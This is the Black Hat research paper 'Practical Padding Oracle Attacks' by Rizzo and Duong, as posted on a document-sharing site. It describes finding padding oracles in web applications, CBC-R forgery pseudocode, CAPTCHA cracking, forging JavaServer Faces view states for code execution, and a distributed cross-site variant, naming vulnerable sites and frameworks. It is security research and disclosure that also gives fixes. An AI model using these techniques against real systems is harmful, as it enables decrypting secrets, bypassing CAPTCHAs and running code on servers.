Top Banner
Practical Padding Oracle Attacks Juliano Rizzo * Thai Duong February 5th, 2010 Abstract At Eurocrypt 2002, Vaudenay introduced a powerful side-channel at- tack, which is called Padding Oracle attack, against CBC-mode encryption with PKCS#5 padding (See [6]). By giving an oracle which on receipt of a ciphertext, decrypting it and then replying to the sender whether the padding is correct or not, he shows that one can efficiently decrypt data without knowing the encryption key. In this paper, we turn Padding Or- acle attack into a new set of practical web hacking techniques. From the starting point being the question: how to find Padding Oracles in real life systems, we proceed to show how to crack various CAPTCHA in popular web sites. Then we show how to decrypt view states in JavaServer Faces web development frameworks. We go on extending Padding Oracle attack by introducing CBC-R, a technique that allows attackers with access to a Padding Oracle to efficiently encrypt arbitrary plaintexts under the same key as that oracle. CBC-R permits us to mount the most interesting ex- ploits such as creating CAPTCHA graffiti for fun, or creating malicious view states to run arbitrary code in JavaServer Faces for profit. Then we show how to combine Padding Oracle attack and cross-domain infor- mation leakage in web browsers to deploy a distributed Padding Oracle attack. We demonstrate that one can use this technique to map all cipher- texts to corresponding plaintexts, hence break under-lied cryptosystems, in a fast, distributed manner. Finally, we describe several popular systems vulnerable to Padding Oracle attacks that we found during this research. We strongly believe that this is just the tip of the iceberg, and the tech- niques we describe in this paper would uncover many more vulnerabilities for years to come. 1 Introduction In this research, we show that widely used web development frameworks and web sites are using encryption wrongly that allow attackers to read and modify * http://netifera.com, [email protected] http://vnsecurity.net, [email protected] 1
17

BlackHat-Practical Padding Oracle Attacks

Apr 07, 2015

Download

Documents

loihut
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: BlackHat-Practical Padding Oracle Attacks

Practical Padding Oracle Attacks

Juliano Rizzo∗ Thai Duong†

February 5th, 2010

Abstract

At Eurocrypt 2002, Vaudenay introduced a powerful side-channel at-tack, which is called Padding Oracle attack, against CBC-mode encryptionwith PKCS#5 padding (See [6]). By giving an oracle which on receipt ofa ciphertext, decrypting it and then replying to the sender whether thepadding is correct or not, he shows that one can efficiently decrypt datawithout knowing the encryption key. In this paper, we turn Padding Or-acle attack into a new set of practical web hacking techniques. From thestarting point being the question: how to find Padding Oracles in real lifesystems, we proceed to show how to crack various CAPTCHA in popularweb sites. Then we show how to decrypt view states in JavaServer Facesweb development frameworks. We go on extending Padding Oracle attackby introducing CBC-R, a technique that allows attackers with access to aPadding Oracle to efficiently encrypt arbitrary plaintexts under the samekey as that oracle. CBC-R permits us to mount the most interesting ex-ploits such as creating CAPTCHA graffiti for fun, or creating maliciousview states to run arbitrary code in JavaServer Faces for profit. Thenwe show how to combine Padding Oracle attack and cross-domain infor-mation leakage in web browsers to deploy a distributed Padding Oracleattack. We demonstrate that one can use this technique to map all cipher-texts to corresponding plaintexts, hence break under-lied cryptosystems,in a fast, distributed manner. Finally, we describe several popular systemsvulnerable to Padding Oracle attacks that we found during this research.We strongly believe that this is just the tip of the iceberg, and the tech-niques we describe in this paper would uncover many more vulnerabilitiesfor years to come.

1 Introduction

In this research, we show that widely used web development frameworks andweb sites are using encryption wrongly that allow attackers to read and modify∗http://netifera.com, [email protected]†http://vnsecurity.net, [email protected]

1

Page 2: BlackHat-Practical Padding Oracle Attacks

data that should be protected. It has been known for years in cryptographycommunity that encryption is not authentication. If encrypted messages arenot authenticated, data integrity cannot be guaranteed which makes systemsvulnerable to practical and dangerous chosen-ciphertext attacks, one of thembeing Padding Oracle attack that Vaudenay presented at EuroCrypt 2002 (See[6]). As explained in Paterson and Yau’s summary in [5], Padding Oracle attackrequires an oracle which on receipt of a ciphertext, decrypts it and replies to thesender whether the padding is VALID or INVALID. The attack works under theassumption that the attackers can intercept padded messages encrypted in CBCmode, and have access to the aforementioned padding oracle. The result is thatattackers can recover the plaintext corresponding to any block of ciphertextusing an average of 128 ? b oracle calls, where b is the number of bytes in ablock. The easiest fix for Padding Oracle attack is to encrypt-then-MAC, i.e.encrypting information to get the ciphertext, then signing the ciphertext witha Message Authentication Code scheme. One can use a ciphertext mode thatcombines both data confidentiality and data authenticity such as CCM, OCB,EAX, or GCM 1. For more details on Vaudenay’s attack and suggested fixes,please see [7, 1, 3, 4, 5].

In Section 2, we describe manual and automated testing techniques to findPadding Oracle in real life systems. In Section 3, we describe basic PaddingOracle attacks to crack CAPTCHA and decrypt secret data of popular websites and web development frameworks. In Section 4, we introduce advancedPadding Oracle attacks that allow us to mount the most interesting exploitssuch as creating CAPTCHA graffiti for fun, or creating malicious view statesto run arbitrary code in JavaServer Faces for profit. In Section 5, we list sev-eral popular web development frameworks and web sites that are vulnerableto Padding Oracle attacks, including but not limited to eBay Latin America,Apache MyFaces, SUN Mojarra, Ruby On Rails, OWASP ESAPI, etc. Weconclude in Section 6.

2 Finding Padding Oracles

If you start looking today, you would see that Padding Oracle is pervasive.It’s everywhere like SQL Injection or Cross Site Scripting. This is because fewpeople believe that attackers can decrypt their encrypted secrets if they leakout just 1-bit information. Unfortunately, the reality is that if you somehowlet attackers know that whether or not an error has occurred while you decryptsomething, then they can decrypt your messages. Succinctly in short, leak 1-bit,and you are 0wn3d.

1See http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation for links to rele-vant RFCs and papers of these modes

2

Page 3: BlackHat-Practical Padding Oracle Attacks

2.1 Manual Testing

We have been using three methods to find Padding Oracle:

Backbox Testing We crawl the target web site to find Base64 strings whichcan be found in hidden fields, cookies, or request parameters 2. Then we decodeeach Base64 string found. If the result looks random, and its length is a multipleof common block cipher sizes, i.e. 8, 16 or 32 bytes, then there’s a good chancethat it is a ciphertext. We also look for common separators, i.e. --, | or :,which are often used to separate IV, ciphertext, or MAC. Then we replace abyte in the last block of the ciphertext by a random value, then send it back tothe target, and see what changes in the response. If there is an error message,then there’s a high chance that this is a Padding Oracle. Even a blank page isenough information to perform this attack.

Google Hacking We also look for known error messages and standard APIexceptions. In Java, the error message is Given final block not properlypadded, and the standard exception is javax.crypto.BadPaddingException.Other platforms and crypto libraries provide different error messages and APIexceptions. Just googling these messages, we promise that you can find tons ofinteresting Padding Oracles.

Source Code Auditing Another way is to look for known source code key-words. You can start by looking for code that imports low level cryptographylibraries such as:

C/C++: OpenSSL, Crypto++

Python: PyCrypto, M2Crypto

.NET: .NET Cryptography, Microsoft CryptoAPI

Java: Java Crypto Extension, BouncyCastle

Then look for routines that perform encryption and decryption. If there’s somecode to handle error while decrypting, and/or no sign of MAC usage, then it’shigh probability you have found a target for the Padding Oracle attack.

Regardless of which method one uses, the most important thing is to analyseand understand the meaning of error messages returned by the target uponreceiving mangled ciphertexts. In short, you need to know when the padding isVALID, and when it’s INVALID.

2A funny side effect of doing this research is now both of us are obsessed with Base64strings. Every time we see a Base64 message, we decode it, and if it’s not plaintext, weassume it is a ciphertext, then go on trying to decrypt it using Padding Oracle attack. It’sreally fun!

3

Page 4: BlackHat-Practical Padding Oracle Attacks

2.2 Automated Testing

After doing some manual testing, one usually needs to use an automated toolto confirm the existence of Padding Oracles. By changing the ciphertext ran-domly, the ultimate goal of automated tools is to force the target reveal asmany different reactions to the modified messages as possible. We are goingto release POET a.k.a Padding Oracle Exploitation Tool 3which finds andexploits Padding Oracle automatically.

If you want to write your own tool to detect Padding Oracle, you can followthis guideline which is very similar to the last word decryption algorithm thatVaudenay described in his seminal paper (See [6, Section 3.1]):

1. Pick a few random words r1, ..., rb where b denotes the cipher block size,and take i = 0

2. Pick r = r1|...|rb−1|(rb ⊕ i), where | denotes contatenation.

3. Send r|y to the target web site, where y is a valid ciphertext block thatyou found during the manual testing phase. Record the value of i, contentlength, and content type of the response. Increment i, and go back to step2 until i > 255.

4. Now you have 256 responses. If all of them are the same, then it’s badnews, the target is not easily showing you that it is vulnerable to PaddingOracle attack. Otherwise, look at each value of i where the responsesare different from the rest. Manually resend each corresponding r|y, andexamine carefully each response to see what happens.

A final note is people often use one global crypto key and a fixed IV to encrypteverything, so if attackers found a Padding Oracle, then they can use it todecrypt all data encrypted under that key and IV.

3 Basic Padding Oracle Attacks

Since HTTP is a stateless protocol, web developers must either manage states onthe server, or push them to the client. For performance and scalability reasons,most web developers tend to go with the latter method. They want to keep thestate as a secret, and turn to cryptography which is the right tool. However,they use it wrongly, i.e. neither sign the ciphertext nor use an authenticatedblock cipher mode, and make their systems vulnerable to Padding Oracle attack.

In this section, we show two basic Padding Oracles attacks:3POET has probably been released by the time you read this paper. You can download it

at http://netifera.com/research

4

Page 5: BlackHat-Practical Padding Oracle Attacks

• Cracking CAPTCHA systems.

• Decrypting JavaServer Faces view states.

3.1 Cracking CAPTCHA

CAPTCHA is the most popular technique to prevent computer programs fromsubmitting automated requests to web servers. A common type of CAPTCHArequires that users enter an alphanumeric code from a distorted image. Wefound that some crypto-based CAPTCHA systems are probably the simplestexamples of Padding Oracle attacks.

A vulnerable CAPTCHA system works as follows:

1. The server generates a random code, encrypts it using CBC-mode undersome key K and some IV:

ERC = EK,IV (rand())

2. This ERC would be used as a parameter for some captcha.jsp 4whichupon receipt of a ERC , will decrypt it, and generate a distorted image.If a HTML form needs to show a CAPTCHA, it just puts something like/captcha.jsp?token=ERC into a <img> tag to load a distorted image.

3. ERC is stored either as a hidden field in the CAPTCHA form or as acookie, so once a user submits, it would be sent back to the server.

4. Then the server goes on decrypting ERC, and compares it with the codethat the user has entered. If equal, the server accepts the request; it deniesthe request otherwise.

Because captcha.jsp would decrypt any ERC sent to it, it is vulnerable toPadding Oracle attack. As we discussed in Section 2, the only remaining prob-lem now is to know when padding is VALID, and when it’s not.

Fortunately, most CAPTCHA systems would send back an error notificationwhen they fail to decrypt ERC, i.e. padding is INVALID. Some servers sendeither empty responses or HTML with an error message. In addition, whenyou modify ERC so that the padding is VALID, captcha.jsp would display animage with a broken code.

If things work out that way, attackers now have a Padding Oracle, and they canuse it to decrypt any ERC to get its random code, hence bypass the CAPTCHAprotection completely.

4Please note that what we describe here works for any platform and language, we just useJava/JSP as an example

5

Page 6: BlackHat-Practical Padding Oracle Attacks

CAPTCHA with secret IV Since

P0 = IV ⊕DPaddingOracle(C0)

attackers need to know the IV to be able to get P0. In other words, if the IVis secret, one can’t know P0 , and can’t crack CAPTCHA systems whose P0

contains part of the random code.

Fortunately, for those CAPTCHA systems that we have found during this re-search, the IV can be recovered easily with human intervention. Most of thetime the text shown in the CAPTCHA image is exactly as P0, so if attackersknow DPaddingOracle(C0), then they can compute the secret IV as following:

IV = Human⊕DPaddingOracle(C0)

where Human denotes that somebody reads P0 from the CAPTCHA image.This is very useful to attack CAPTCHA systems where manually discoveringthe IV a single time allows one to decrypt any new challenges, given the IV isnot changed, without any further human intervention.

3.2 Decrypting JSF view states

JavaServer Faces introduces a powerful and flexible system for saving and restor-ing the state of the view between requests to the server. JSF implementationssupport two primary mechanisms for saving states, based on the value of thejavax.faces.STATE_SAVING_METHOD initialization parameter. If this parame-ter is set to client, then it would cause the saved state to be included in therendered markup that is sent to the client (such as in a hidden input field forHTML). The state information must be included in the subsequent request,making it possible for JSF to restore the view without having saved informationon the server side.

Although JSF specification advises that state information should be encryptedand tamper evident, as far as we know no implementation follows that ad-vice. Some frameworks such as SUN Mojarra and Apache MyFaces do encryptstate information, but they don’t protect the integrity of encrypted states whichmakes them vulnerable to Padding Oracle attacks.

By default, all JSF frameworks would display a very detailed error message if itfails to decrypt a view state, which makes the Padding Oracle very obvious: ifone sees javax.crypto.BadPaddingException, then it’s INVALID padding; it’sVALID padding otherwise.

Most JSF frameworks allow developers to turn off error messages. Then attack-ers can use the following simple trick. Say an attacker wants to decrypt block Ci

of an encrypted view state C0|C1|...|Cn−1, then they would append Crandom|Ci

to create C0|C1|...|Cn−1|Crandom|Ci, and send this message to the server. SinceJava ignores those extra blocks while decrypting and deserializing view states,

6

Page 7: BlackHat-Practical Padding Oracle Attacks

Figure 1: Apache MyFaces error-page

one can have a safe bet that it’s VALID padding if the server returns the samepage as when the view state is unaltered. It’s probably INVALID padding if onesees something else, e.g., a HTTP 500 error message.

View states usually contain not very sensitive data, but it’s important to stressthat some frameworks save to the client not only the view, but also the entiremanaged beans which could possibly contain confidential data 5.

4 Advanced Padding Oracle Attacks

4.1 Using Padding Oracles to Encrypt

A Padding Oracle is all attackers need to decrypt messages. But can PaddingOracle help if their goal is to encrypt messages? The short answer is yes. Wedesigned the following technique, which allows one to use a Padding Oracle toencrypt messages of any length under the same key as the Padding Oracle. Itis very simple but we have not seen it published before, given the surprisinglyfruitful consequences of this finding. We call it CBC-R encryption, and Section4.1.2 shows that CBC-R has permitted us to mount the most interesting exploits.

5For Apache MyFaces, see http://wiki.apache.org/myfaces/SaveState

7

Page 8: BlackHat-Practical Padding Oracle Attacks

Figure 2: Decrypted Apache MyFaces view state

4.1.1 CBC-R Encryption

CBC-R turns a decryption oracle into an encryption oracle 6. We all know thatCBC decryption works as following:

Pi = DK(Ci)⊕ Ci−1

C0 = IV

Look at the XOR operation. It takes two parameters: one is the previous cipher-text block Ci−1 which is controlled by attackers, and another is the intermediateplaintext block of the current ciphertex block DK(Ci). Attackers don’t have ac-cess to K, but they can use a Padding Oracle to get DK(Ci). In other words,attackers can make that XOR operation to produce any plaintext block Pi asthey want.

The process is simple. Attackers take one random ciphertext block, call it Ci .Any random block would work. They send that block to the Padding Oracle toget its intermediate plaintext, call this operation DPaddingOracle(Ci). Since

Pi = Ci−1 ⊕DPaddingOracle(Ci)

and attackers control Ci−1, they can make Pi equal to anything they want. Butdoes this make Pi−1 garbled? Yes, but attackers can fix Pi−1 by sending Ci−1

to the Padding Oracle to get its intermediate plaintext, and set:

Ci−2 = Pi−1 ⊕DPaddingOracle(Ci−1)

6Please note that Padding Oracle is just one kind of decryption oracles that can work wellwith CBC-R

8

Page 9: BlackHat-Practical Padding Oracle Attacks

1. Cn−1 = random

2. for i = n− 1 down to 1:

Ci−1 = Pi ⊕DPaddingOracle(Ci)

3. IV = P0 ⊕DPaddingOracle(C0)

Figure 3: CBC-R pseudocode

Figure 4: CBC-R Encryption

Now they have two consecutive plaintext blocks of their choice, and a leadinggarbled block that they can correct by inserting a new ciphertext block. Re-peating this operation, they can efficiently encrypt a complete message blockby block, starting from the last one. Since the first block of the CBC ciphertextstream depends on the IV, if attackers can set the IV, then the decrypted datawill be exactly as what they want without any garbled block. If attackers don’tcontrol the IV, then the first block is garbled. In the next paragraph, we discusswhat attackers can do if they don’t control the IV.

CBC-R Without Controlling IV Different cryptosystems handle IV indifferent ways. IV can be either a prefix of the ciphertext, and totally control-lable by attackers, or a fixed well known value, but attackers cannot changeit. Cryptosystems also use secret IVs, then either change them every once in awhile, or set them as a fixed static value.

9

Page 10: BlackHat-Practical Padding Oracle Attacks

We said that CBC-R allows attackers to encrypt any message, but if theycannot set the IV, the first plaintext block will be random and meaningless. Ifthe victim expects the decrypted message to start with a standard header, andattackers don’t control the IV, then the victim will ignore the forged messageconstructed by CBC-R. This is what happens with compressed data, and Javaserialized object streams to name a few.

This limitation could prevent some of the highest impact attacks, and we havenot found generic way to overcome it. However, we have found workarounds forparticular cases.

Using Captured Ciphertext As Prefix If attackers capture a ciphertextwhose plaintext is a valid message, then they can prepend the ciphertext totheir CBC-R encrypted message to get a valid header after decrypting:

Pvalid = DK(Ccaptured|IVCBC−R|PCBC−R)

The resulting forged plaintext message will have a valid header, but it still has agarbled block at the position of IVCBC−R. This broken block can still make thevictim reject the message, but we can make the victim ignore it if we choose theprefix carefully, i.e. the garbled block becomes part of some string that doesn’taffect the semantic of the message such as comment or textbox label.

Brute-Forcing C0 In CBC-R, the final block Cn−1 is a random block (SeeFigure 3). Each different Cn−1would yield a different Cn−1, ..., C0 chain. Inother words, CBC-R can produce many different ciphertexts that decryptedto the same plaintext block chain Pn−1, ..., P1. The only difference is the firstplaintext block which is computed as following:

P0 = DK(C0)⊕ IV

Attackers want P0 to contain a valid header. In some systems, this means thatthe first few bytes of P0 must match some magic numbers. There are alsosystems that accept a message if the first byte of its P0 matches its size. If thisis the case, and if the message is short enough, attackers can try their luck bybrute-forcing C0.

The idea is simple: attackers change Cn−1, hence change C0, until they can geta valid P0. For example, if the first byte of P0 must match the message size, oneneeds to try at most 256 different CBC-R ciphertexts to obtain a valid message.For longer messages or more complex message validation rules, brute-forcing isnot practical.

4.1.2 CBC-R Applications

sudo make me a CAPTCHA Since CBC-R can help one to encrypt ar-bitrary messages of any length. In other words, one can use CBC-R to create

10

Page 11: BlackHat-Practical Padding Oracle Attacks

Figure 5: PWN3D CAPTCHA powered by CBC-R

arbitrary CAPTCHA graffiti for fun ;-). Check out Figure 5 7 and Figure 6 8.

Creating Malicious JSF view states It’s easy to see that attackers canuse CBC-R to create malicious view states that in worst case could allow themto execute code in vulnerable JSF systems. The two remaining questions are:

• Which view states to create?

• How to solve the garbled block problem? 9

For the first question, the book of Apache MyFaces and Facelets technologyobserved that (See [8]):

[...]When the HTML form is submitted it carries the view state valueback to the server in the form of an HTTP parameter. JSF uses thevalue of this parameter to reconstruct the view during the restoreview phase. The view is restored by reversing the process used to

7See http://bit.ly/pwn3dCAPTCHA8See http://bit.ly/0wn3dCAPTCHA (please note that this CAPTCHA was not made by

CBC-R ;-)9We have to solve this problem because we don’t control the IV of most JSF frameworks

11

Page 12: BlackHat-Practical Padding Oracle Attacks

Figure 6: 0WN3D CAPTCHA

obtain the view state: it is decoded and deserialized. This poses amajor security challenge to any JSF implementation because Seanhas the freedom to change the view state. He can toggle the renderedattribute of UI controls that are not supposed to be available to him.He can point a commandButton to a method on any managed beanin the application. He can circumvent an action listener.

While we were writing this paper, a researcher published an advisory describingvulnerabilities in Apache MyFaces and SUN Mojarra, and claimed that (See [2])10:

[...]it is possible for an attacker to supply a new or modified viewobject as part of a request. The malicious view can contain arbitraryHTML code (allowing Cross-Site Scripting), and arbitrary Expres-sion Language (EL) statements that will be executed on the server.The EL statements can be used to read data stored in user-scopedsession variables, and application or server-scoped variables. Sincethese variables should be inaccessible by the user, it is not uncom-mon to store sensitive data in them.

10It’s important to stress that the authors of [8] and [2] were wrong when they suggestedthat encrypting view states would solve the attacks they described

12

Page 13: BlackHat-Practical Padding Oracle Attacks

As a result, we know which view states to create. For the second question, itdepends on the content of JSF view states which are Java Object SerializationStream 11. The generic solution is to use the technique described in Section4.1.1 to prepend known valid ciphertext to our CBC-R encrypted view state12, and make the garbled block become part of a string that doesn’t affect thesemantic of the view state such as textbox label.

Please note that although we attack only JSF view states, our techniques canbe applied to exploit other kind of state information in different formats such asXML, serialized objects, JSON, simply comma separated variable-value pairs,etc.

4.2 Distributed Cross-Site Padding Oracle Attack

As we have demonstrated up to this point, all attackers need to exploit PaddingOracle is a single bit of information. If a web site leaks out that 1-bit informa-tion, then there are a lot of ways for attackers to obtain it using cross-domaininformation leakage bugs in web browsers.

If you are familiar with web browser security, you probably know that JavaScriptat evil.com can not read the response of a request to victim.com, otherwisethis would allow all kind of abuses from evil web sites. But there’s nothing tostop evil.com referencing resources on victim.com, observing how the serverresponds, and deducing information.

Using <img> tag plus the onerror()/onload() events, JavaScript at evil.comcan make web browsers to load an image at victim.com, and know if the imageis loaded or not. This is 1-bit information, and as you know, it’s enough forPadding Oracle attack to work: if the image is loaded, then it’s VALID padding;otherwise, it’s INVALID padding.

This technique has allowed us to successfully decrypt all CAPTCHA on a targetweb site using only JavaScript hosted in a different server 13. If a target isinteresting enough, attackers could inject JavaScript code into popular web sites,and when people visit those web sites, the code will run in their browsers, anduse their CPU time and Internet connection to decrypt the target’s secrets. Itis possible to distributively build a code book, i.e. a mapping of ciphertext tocorresponding plaintext under the same key and IV as the Padding Oracle. Thiscode book in turn can be used to automatically bypass CAPTCHA protectionwith 100% accuracy regardless of the graphical complexity.

11See http://java.sun.com/j2se/1.5.0/docs/guide/serialization/spec/protocol.html#810112All JSF view states start with the same known header. See Figure 213Watch it at http://www.youtube.com/watch_private?v=e46A-

PUpDvk&sharing_token=ZaLFKwi0ipTWzw_2vThJSA (you need to login into YouTube)

13

Page 14: BlackHat-Practical Padding Oracle Attacks

5 Some Vulnerable Systems

Below are several web development frameworks and web sites vulnerable toPadding Oracle attacks that we found during this research. Due to time con-straint, we look at only popular systems, i.e. web sites with a large numberof customers, and frameworks with a large number of developers. We stronglybelieve that this is just the tip of the iceberg, and the techniques we describe inthis paper would uncover many more vulnerabilities for years to come.

5.1 Broken CAPTCHA systems

MercadoLibre.com, a.k.a eBay Latin America, is Latin America’s number-one e-commerce site with more than 40 million registered users that buyand sell products. We found that MercadoLibre’s CAPTCHA 14 can becracked by using the technique described in Section 3.1. Please note thatMercadoLibre’s CAPTCHA uses a secret IV, so one needs to manuallyrecover the secret IV before automating their CAPTCHA cracking process.

BIDZ.com is a leading online retailer of jewelry that is ranked 5th amongstauction sites according to Alexa. We found that attackers can crackBIDZ’s CAPTCHA 15 using the technique described in Section 3.1. Sinceattackers can control the IV of BIDZ’s CAPTCHA, they can apply CBC-R technique to create CAPTCHA graffiti for fun (See Figure 5). We alsouse BIDZ as the target to demonstrate the power of a distributed PaddingOracle attack, as described in Section 4.2 16.

5.2 Broken JSF implementations

There are probably a handful of JSF implementations out there, but we don’thave time to test all of them so we focus on the most two popular which areApache MyFaces and SUN Mojarra. Both of them can be attacked using thetechniques described in Section 3.2 and Section 4.1.2.

5.3 Others

5.3.1 Ruby On Rails

Ruby On Rails 17, which was created in 2003, is probably the most widely usedweb development framework in the world. Since version 2.3, Ruby On Rails has

14See http://www.mercadolibre.com.ar/jm/reg15See http://www.bidz.com/bzJApp/ViewCustomerLoginForm.action16Watch the screen cast at http://www.youtube.com/watch_private?v=e46A-

PUpDvk&sharing_token=ZaLFKwi0ipTWzw_2vThJSA (you need to login into YouTube)17See http://www.rubyonrails.org

14

Page 15: BlackHat-Practical Padding Oracle Attacks

introduced ActiveSupport::MessageEncryptor 18 which is a set of functions“to provide a simple way to encrypt information for storage in an untrusted lo-cation (like cookies).” 19. If you look at ActiveSupport::MessageEncryptor’ssource code, you would probably see that applications that use the providedencrypt/decrypt functions would be vulnerable to Padding Oracle attacks.It’s ironic that the developers of ActiveSupport::MessageEncryptor do pro-vide a secure pair of functions to encrypt/decrypt data that are not vulnerableto Padding Oracle attacks, but they still keep the vulnerable ones to confusetheir users.

5.3.2 OWASP ESAPI

OWASP ESAPI 20, which stands for OWASP Enterprise Security API Toolkits,is a project that claim to “help software developers guard against security-relateddesign and implementation flaws.” However, we found that all OWASP ESAPIfor Java up to version 2.0 RC2 are vulnerable to Padding Oracle attacks 21.There were some significant changes in ESAPI Encryption API since 2.0 RC322. Unfortunately, while these changes are heading towards the correct direction,i.e. signing the ciphertex or using an authenticated encryption mode, but at thetime of this writing, there are still some bugs in the latest implementation 23

that make applications using ESAPI for Java still vulnerable to Padding Oracleattacks. We leave the finding of these bugs as an exercise for readers.

6 Conclusion

Nate Lawson 24 once said 25:

[...]If you find yourself needing to implement crypto, it’s likely youcan avoid it by thinking about the situation differently. For example,many web developers get seduced into designing their own crypto asa way to push state to the client instead of managing it on the server.This opens up a much wider attack surface on the server applicationsince now every part of that blob needs to be considered malicious.As the saying goes, "... now you have two problems."

18See http://api.rubyonrails.org/classes/ActiveSupport/MessageEncryptor.html19See http://guides.rails.info/2_3_release_notes.html20See http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API21See http://owasp-esapi-java.googlecode.com/svn/trunk_doc/1.4.4/org/owasp/esapi/reference/JavaEncryptor.html22See http://owasp-esapi-java.googlecode.com/svn/trunk/documentation/esapi4java-core-

2.0-readme-crypto-changes.html23See http://owasp-esapi-java.googlecode.com/svn/trunk/src/main/java/org/owasp/esapi/reference/crypto/JavaEncryptor.java24http://www.root.org25http://news.ycombinator.com/item?id=621227

15

Page 16: BlackHat-Practical Padding Oracle Attacks

The reason all this is so hard is that crypto is fundamentally unsafe.People hear that crypto is strong and confuse that with safe. Cryptocan indeed be very strong but is extremely unsafe.

We can’t agree more with Nate. Even OWASP folks can not get crypto right,how can an average Joe do that? Crypto is difficult and expensive to get right.Conversely, there are good high-level libraries available. Sure there are a fewcases where you have to do custom development, incurring that cost. Butmaking "roll your own" the default development practice is like coding yourown webserver in assembly. You can eventually get it right, but you’re makingyour job much harder than it has to be and risking a lot for your company forno real gain.

7 Acknowledgments

References

[1] J. Black and H. Urtubia. Side-Channel Attacks on Symmetric EncryptionSchemes: The Case for Authenticated Encryption. In Proceedings of the11th USENIX Security Symposium, San Francisco, CA, USA, August 5-9,2002, pages 327–338. USENIX, 2002.

[2] D. Byrne. “Multiplatform View State Tampering Vulnerabilities”.Trustwave’s SpiderLabs. 8 Feb. 2009. Trustwave. 24 Feb. 2009https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt

[3] B. Canvel, A. Hiltgen, S. Vaudenay, and M. Vuagnoux. Password Intercep-tion in a SSL/TLS Channel. In Proc. CRYPTO 2003, D. Boneh (ed.), LNCSVol. 2729, pp. 583–599, 2003.

[4] V. Klima and T. Rosa. Side Channel Attacks on CBC Encrypted Messagesin the PKCS#7 Format. Cryptology ePrint Archive, Report 2003/098, 2003.

[5] K.G. Paterson and A. Yau. Padding Oracle Attacks on the ISO CBC ModePadding Standard. In T. Okamoto, editor, Topics in Cryptology — CT-RSA2004, volume 2964 of Lecture Notes in Computer Science, pages 305–323.Springer-Verlag, 2004.

[6] S. Vaudenay. Security Flaws Induced by CBC Padding — Applications toSSL, IPSEC, WTLS...In L. Knudsen, editor, Advances in Cryptology —EUROCRYPT 2002, volume 2332 of Lecture Notes in Computer Science,pages 534–545. Springer-Verlag, 2002

[7] A. K. L. Yau, K. G. Paterson, and C. J. Mitchell. Padding Oracle Attacks onCBC- Mode Encryption with Secret and Random IVs. In H. Gilbert and H.Handschuh, editors, Proceedings of FSE 2005, volume 3557 of LNCS, pages299–319. Springer- Verlag, 2005.

16

Page 17: BlackHat-Practical Padding Oracle Attacks

[8] Z. Wadia, M. Marinschek, Hazem Saleh, and Dennis Byrne. Antipatternsand Pitfalls. In The Definitive Guide to Apache MyFaces and Facelets, pages229-269. Apress, 2008.

17